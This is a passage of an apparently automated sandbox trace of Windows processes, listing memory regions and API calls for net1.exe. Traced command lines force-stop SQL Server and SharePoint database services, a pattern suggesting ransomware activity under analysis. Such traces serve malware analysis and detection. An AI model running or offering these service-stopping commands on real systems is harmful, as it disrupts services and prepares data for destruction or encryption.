"" Region: id = 7798 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7799 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7800 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 7801 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7802 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7803 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7804 start_va = 0xff520000 end_va = 0xff552fff entry_point = 0xff520000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7805 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7806 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7807 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7808 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7809 start_va = 0x470000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7810 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7811 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7865 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7866 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7867 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7868 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 7869 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 7870 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7871 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7872 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7873 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7874 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7875 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7876 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7877 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7878 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7879 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7880 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7881 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7882 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7883 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7884 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7885 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7886 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7887 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7888 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 638 os_tid = 0x570 [0104.045] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fd10 | out: lpSystemTimeAsFileTime=0x28fd10*(dwLowDateTime=0xf32f35d0, dwHighDateTime=0x1d48689)) [0104.045] GetCurrentProcessId () returned 0xa88 [0104.046] GetCurrentThreadId () returned 0x570 [0104.046] GetTickCount () returned 0x23c54 [0104.046] QueryPerformanceCounter (in: lpPerformanceCount=0x28fd18 | out: lpPerformanceCount=0x28fd18*=1815096400000) returned 1 [0104.047] GetModuleHandleW (lpModuleName=0x0) returned 0xff520000 [0104.047] __set_app_type (_Type=0x1) [0104.047] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff539c9c) returned 0x0 [0104.048] __getmainargs (in: _Argc=0xff544780, _Argv=0xff544790, _Env=0xff544788, _DoWildCard=0, _StartInfo=0xff54479c | out: _Argc=0xff544780, _Argv=0xff544790, _Env=0xff544788) returned 0 [0104.048] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.048] GetConsoleOutputCP () returned 0x1b5 [0104.048] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff54cec0 | out: lpCPInfo=0xff54cec0) returned 1 [0104.048] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0104.050] sprintf_s (in: _DstBuf=0x28fcb8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0104.051] setlocale (category=0, locale=".437") returned="English_United States.437" [0104.052] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.052] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0104.052] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQL_2008 /y" [0104.052] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28fa50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0104.052] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0104.053] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fca8 | out: Buffer=0x28fca8*=0x484d50) returned 0x0 [0104.053] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fca8 | out: Buffer=0x28fca8*=0x48c100) returned 0x0 [0104.053] _fileno (_File=0x7fefdba2a80) returned 0 [0104.053] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0104.053] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0104.053] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0104.053] _wcsicmp (_String1="config", _String2="stop") returned -16 [0104.053] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0104.053] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0104.053] _wcsicmp (_String1="file", _String2="stop") returned -13 [0104.053] _wcsicmp (_String1="files", _String2="stop") returned -13 [0104.053] _wcsicmp (_String1="group", _String2="stop") returned -12 [0104.053] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0104.053] _wcsicmp (_String1="help", _String2="stop") returned -11 [0104.053] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0104.053] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0104.053] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0104.053] _wcsicmp (_String1="session", _String2="stop") returned -15 [0104.053] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0104.053] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0104.053] _wcsicmp (_String1="share", _String2="stop") returned -12 [0104.053] _wcsicmp (_String1="start", _String2="stop") returned -14 [0104.053] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0104.053] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0104.054] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0104.054] _wcsicmp (_String1="accounts", _String2="MSSQL$SQL_2008") returned -12 [0104.054] _wcsicmp (_String1="computer", _String2="MSSQL$SQL_2008") returned -10 [0104.054] _wcsicmp (_String1="config", _String2="MSSQL$SQL_2008") returned -10 [0104.054] _wcsicmp (_String1="continue", _String2="MSSQL$SQL_2008") returned -10 [0104.054] _wcsicmp (_String1="cont", _String2="MSSQL$SQL_2008") returned -10 [0104.054] _wcsicmp (_String1="file", _String2="MSSQL$SQL_2008") returned -7 [0104.054] _wcsicmp (_String1="files", _String2="MSSQL$SQL_2008") returned -7 [0104.054] _wcsicmp (_String1="group", _String2="MSSQL$SQL_2008") returned -6 [0104.054] _wcsicmp (_String1="groups", _String2="MSSQL$SQL_2008") returned -6 [0104.054] _wcsicmp (_String1="help", _String2="MSSQL$SQL_2008") returned -5 [0104.054] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SQL_2008") returned -5 [0104.054] _wcsicmp (_String1="localgroup", _String2="MSSQL$SQL_2008") returned -1 [0104.054] _wcsicmp (_String1="pause", _String2="MSSQL$SQL_2008") returned 3 [0104.054] _wcsicmp (_String1="session", _String2="MSSQL$SQL_2008") returned 6 [0104.054] _wcsicmp (_String1="sessions", _String2="MSSQL$SQL_2008") returned 6 [0104.054] _wcsicmp (_String1="sess", _String2="MSSQL$SQL_2008") returned 6 [0104.054] _wcsicmp (_String1="share", _String2="MSSQL$SQL_2008") returned 6 [0104.054] _wcsicmp (_String1="start", _String2="MSSQL$SQL_2008") returned 6 [0104.054] _wcsicmp (_String1="stats", _String2="MSSQL$SQL_2008") returned 6 [0104.054] _wcsicmp (_String1="statistics", _String2="MSSQL$SQL_2008") returned 6 [0104.054] _wcsicmp (_String1="stop", _String2="MSSQL$SQL_2008") returned 6 [0104.054] _wcsicmp (_String1="time", _String2="MSSQL$SQL_2008") returned 7 [0104.054] _wcsicmp (_String1="user", _String2="MSSQL$SQL_2008") returned 8 [0104.054] _wcsicmp (_String1="users", _String2="MSSQL$SQL_2008") returned 8 [0104.054] _wcsicmp (_String1="msg", _String2="MSSQL$SQL_2008") returned -12 [0104.054] _wcsicmp (_String1="messenger", _String2="MSSQL$SQL_2008") returned -14 [0104.054] _wcsicmp (_String1="receiver", _String2="MSSQL$SQL_2008") returned 5 [0104.054] _wcsicmp (_String1="rcv", _String2="MSSQL$SQL_2008") returned 5 [0104.054] _wcsicmp (_String1="netpopup", _String2="MSSQL$SQL_2008") returned 1 [0104.054] _wcsicmp (_String1="redirector", _String2="MSSQL$SQL_2008") returned 5 [0104.055] _wcsicmp (_String1="redir", _String2="MSSQL$SQL_2008") returned 5 [0104.055] _wcsicmp (_String1="rdr", _String2="MSSQL$SQL_2008") returned 5 [0104.055] _wcsicmp (_String1="workstation", _String2="MSSQL$SQL_2008") returned 10 [0104.055] _wcsicmp (_String1="work", _String2="MSSQL$SQL_2008") returned 10 [0104.055] _wcsicmp (_String1="wksta", _String2="MSSQL$SQL_2008") returned 10 [0104.055] _wcsicmp (_String1="prdr", _String2="MSSQL$SQL_2008") returned 3 [0104.055] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQL_2008") returned -9 [0104.055] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQL_2008") returned -1 [0104.055] _wcsicmp (_String1="server", _String2="MSSQL$SQL_2008") returned 6 [0104.055] _wcsicmp (_String1="svr", _String2="MSSQL$SQL_2008") returned 6 [0104.055] _wcsicmp (_String1="srv", _String2="MSSQL$SQL_2008") returned 6 [0104.055] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQL_2008") returned -1 [0104.055] _wcsicmp (_String1="alerter", _String2="MSSQL$SQL_2008") returned -12 [0104.055] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQL_2008") returned 1 [0104.055] _wcsupr (in: _String="MSSQL$SQL_2008" | out: _String="MSSQL$SQL_2008") returned="MSSQL$SQL_2008" [0104.055] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x48ce10 [0104.059] GetServiceKeyNameW (in: hSCManager=0x48ce10, lpDisplayName="MSSQL$SQL_2008", lpServiceName=0xff545750, lpcchBuffer=0x28fbc8 | out: lpServiceName="", lpcchBuffer=0x28fbc8) returned 0 [0104.060] _wcsicmp (_String1="msg", _String2="MSSQL$SQL_2008") returned -12 [0104.061] _wcsicmp (_String1="messenger", _String2="MSSQL$SQL_2008") returned -14 [0104.061] _wcsicmp (_String1="receiver", _String2="MSSQL$SQL_2008") returned 5 [0104.061] _wcsicmp (_String1="rcv", _String2="MSSQL$SQL_2008") returned 5 [0104.061] _wcsicmp (_String1="redirector", _String2="MSSQL$SQL_2008") returned 5 [0104.061] _wcsicmp (_String1="redir", _String2="MSSQL$SQL_2008") returned 5 [0104.061] _wcsicmp (_String1="rdr", _String2="MSSQL$SQL_2008") returned 5 [0104.061] _wcsicmp (_String1="workstation", _String2="MSSQL$SQL_2008") returned 10 [0104.061] _wcsicmp (_String1="work", _String2="MSSQL$SQL_2008") returned 10 [0104.061] _wcsicmp (_String1="wksta", _String2="MSSQL$SQL_2008") returned 10 [0104.061] _wcsicmp (_String1="prdr", _String2="MSSQL$SQL_2008") returned 3 [0104.061] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQL_2008") returned -9 [0104.061] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQL_2008") returned -1 [0104.061] _wcsicmp (_String1="server", _String2="MSSQL$SQL_2008") returned 6 [0104.061] _wcsicmp (_String1="svr", _String2="MSSQL$SQL_2008") returned 6 [0104.061] _wcsicmp (_String1="srv", _String2="MSSQL$SQL_2008") returned 6 [0104.061] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQL_2008") returned -1 [0104.061] _wcsicmp (_String1="alerter", _String2="MSSQL$SQL_2008") returned -12 [0104.061] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQL_2008") returned 1 [0104.061] NetServiceControl (in: servername=0x0, service="MSSQL$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x28fbd0 | out: bufptr=0x28fbd0) returned 0x889 [0104.062] wcscpy_s (in: _Destination=0xff5480d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0104.062] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0104.063] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff545b50, nSize=0x800, Arguments=0xff547f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0104.065] GetFileType (hFile=0xb) returned 0x2 [0104.065] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa98 | out: lpMode=0x28fa98) returned 1 [0104.065] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff545b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28fa90, lpReserved=0x0 | out: lpBuffer=0xff545b50*, lpNumberOfCharsWritten=0x28fa90*=0x1e) returned 1 [0104.066] GetFileType (hFile=0xb) returned 0x2 [0104.066] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa98 | out: lpMode=0x28fa98) returned 1 [0104.066] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff521efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fa90, lpReserved=0x0 | out: lpBuffer=0xff521efc*, lpNumberOfCharsWritten=0x28fa90*=0x2) returned 1 [0104.067] _ultow (in: _Dest=0x889, _Radix=2685696 | out: _Dest=0x889) returned="2185" [0104.067] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff545b50, nSize=0x800, Arguments=0xff547f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0104.067] GetFileType (hFile=0xb) returned 0x2 [0104.067] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa98 | out: lpMode=0x28fa98) returned 1 [0104.067] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff545b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28fa90, lpReserved=0x0 | out: lpBuffer=0xff545b50*, lpNumberOfCharsWritten=0x28fa90*=0x34) returned 1 [0104.068] GetFileType (hFile=0xb) returned 0x2 [0104.068] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28fa98 | out: lpMode=0x28fa98) returned 1 [0104.068] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff521efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28fa90, lpReserved=0x0 | out: lpBuffer=0xff521efc*, lpNumberOfCharsWritten=0x28fa90*=0x2) returned 1 [0104.068] NetApiBufferFree (Buffer=0x484d50) returned 0x0 [0104.069] NetApiBufferFree (Buffer=0x48c100) returned 0x0 [0104.069] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQL_2008 /y" [0104.069] exit (_Code=2) Process: id = "193" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x58c98000" os_pid = "0x8f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "183" os_parent_pid = "0xc4" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7812 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7813 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7814 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7815 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 7816 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7817 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7818 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7819 start_va = 0xff520000 end_va = 0xff552fff entry_point = 0xff520000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7820 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7821 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7822 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 7823 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7824 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 7825 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7826 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7827 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7828 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7829 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7830 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 7831 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 7832 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7833 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7834 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7835 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7836 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7837 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7838 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7839 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7840 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7841 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7842 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7843 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7844 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7845 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7846 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7847 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7848 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7849 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7889 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 639 os_tid = 0xa08 [0103.990] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fa70 | out: lpSystemTimeAsFileTime=0x18fa70*(dwLowDateTime=0xf32811b0, dwHighDateTime=0x1d48689)) [0103.990] GetCurrentProcessId () returned 0x8f8 [0103.990] GetCurrentThreadId () returned 0xa08 [0103.990] GetTickCount () returned 0x23c25 [0103.990] QueryPerformanceCounter (in: lpPerformanceCount=0x18fa78 | out: 